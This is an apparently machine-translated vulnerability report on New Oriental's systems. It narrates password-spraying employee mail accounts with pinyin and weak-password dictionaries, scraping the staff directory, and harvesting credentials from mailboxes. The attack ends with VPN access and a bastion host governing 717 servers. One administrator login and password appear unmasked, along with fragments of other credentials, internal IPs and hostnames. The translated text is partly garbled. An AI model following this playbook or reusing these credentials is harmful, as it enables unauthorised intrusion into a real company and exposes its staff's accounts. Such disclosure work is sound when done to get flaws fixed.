Due to lax control of the New Oriental account system, Intranet roaming/the boss mode can be enabled (the company has 717 server permissions and databases)

Due to lax control of the New Oriental account system, Intranet roaming/the boss mode can be enabled (the company has 717 server permissions and databases)

What I learned most from wooyun is CAPTCHA human bypass!

1. Entry https://mail.xdf.cn

Use the pinyin dictionary to perform the fuzz test and obtain several anonymous password users.
 

Mask Region

  
   *****   liny**********   xiec**********   zhou**********   liji**********   sunj*****
  

After logging on, there is no sensitive information until you find the mobile client.
 

You can view the Organization address book
 

For example, Yu
 

2. Use a crawler script to get the email accounts of all employees, and then construct a dictionary of weak keyboard passwords and frequently used passwords for programmers.

For example:
 

Mask Region

  
   *****WSX**********SW@**********wsx**********sw2**********EDC**********edc**********EDC**********X3*****
  

............

Get a large number of users
 

Mask Region

  
   *****     1**********i1qaz**********ng1q**********n1qa**********31qa**********     1**********     !**********     1**********     x**********     x**********     x**********xdf@**********xdf@**********    xd**********oxdf@**********xdf@**********gxdf@**********     x**********     q**********     q**********     P**********     p**********     q**********123q**********123qw**********123q**********n3xdf**********3xdf_**********g2123**********o3xdf**********xdf_1**********xdf_1**********xdf_1**********xdf_1**********xdf_12**********xdf_12**********xdf_12**********ng12**********aoxd**********xdf_**********xdf_**********xdf_**********xdf_**********xdf_**********xdf_**********n123**********i123**********n123**********xdf_1**********xdf_1**********1234**********1234+**********1234+**********1234+**********     1**********    1**********    x**********   xdf**********    12**********    12**********    12**********   123**********  1234**********xdf_1**********xdf_12**********xdf_12**********xdf_12**********xdf_**********xdf_**********g3xdf**********xdf_**********xdf_1**********xdf_12**********ngxdf**********xdf_**********xdf_12**********xdf_**********xdf_**********xdf_**********xdf_**********   xdf_**********    xd**********   xdf**********   xdf_**********    xd**********0xdf**********xdf_**********xdf_**********xdf_1**********     x**********    xd**********3xdf_**********g4xdf**********aqingxd**********gxdf**********a3xdf**********     x**********    xd**********    xd*****
  

 

Exactly one is an IT department administrator.
 

zhangzhe11      !QAZ2wsx

 

Search for password keywords

The results show various passwords, which are amazing.
 

 

Mask Region

  
   
* *****. 25 .**********?? Code adm **********. 64.7 * s_zho * U * qx4U *************** *****. 64.7 * s_zho * U * qx4U *************** *****? IP: 172 **********?? Prefe *********** _ prefe *********** N4Jsx @*************** *****?, The last column is the password ,? ******* * *********************** 2.212 *************** * *** cloned? * ******************* Minist *********** qaz @******* *************. 25. * ********** H account? * ********** F.com @********************?? 1? * ********* 172.17 **********? Admin ********** NFO @ xd ********************?? 2? * ********* 172.17 **********? Admin ********** NFO @ xd ********************? Service? * ********* Ows2003 user: admi ************ user: root/office_p @ ss0 **********? Server? **********: Root/6lcWd4voGrloqom | is *********************** angshi ********xd *** *****************: 172.1 **********??: 10.20 ******************* 72.17.64 *********** P-WEB-165 \ ***** *****? Xdf ********************?? V_quyong: How many? ******* * V_quy. * ******************** buy, the following? **********??: Adm: * ********** neworien ************************, password? **********?? Host 192 *********** to repair? **********?? Ssh? ********************?? **********?? :**********? 116 .**********?? * ********* Wanre **********??? * ********* Az @ w ************************* ows: 10. * ********: staff **********?: Xd ********** ows: 10. *************: staff **********?: Xd ******************** zhao *********** xdf. **********. 80.88 (****************************** 2.8 ******* * ** 2.8 *********** uyuany ************** ************************************** ki * *********. c ********************* 2.8 ******* * ** anrong ************************* *****?? * ************** 1.ftp ://**. **. **/_ ****************** f_ch *********** 8qP82 ********* ***********? Supervisor? * ***** 2. http ://**.**.*******??? **********?? 12 *****
  

 
Try to log on
 

 

 

The Administrator was online and accidentally kicked him down.
 

 

 

 

3. Finally, I found the vpn and the supermanager password of the bastion host.

Vpn address

https://vpn.xdf.cn

Vpn user manual http://400.xdf.cn/knowledge/index.jhtm? ProviderNo = 3001 & articleId = 229

Use an email account to log on
 

 

 

 

Bastion host https://gate.staff.xdf.cn webpage mode please visit https://gate.staff.xdf.cn, linux Remote Connection Tool please visit gate.staff.xdf.cn port 222, windows Remote Desktop please visit gate.staff.xdf.cn port 3390

 

Mask Region

  
   
* ***-Baol *********** h2h5. y *********** code ven *****
  

 
717 hosts!
 

Monitors all host sessions and commands
 

 

717 hosts can be managed.
 

All the servers in the company are here.
 

You can also add or delete commands sent by administrators. Please repeat the danger!
 

Solution:

VLAN Division over the Intranet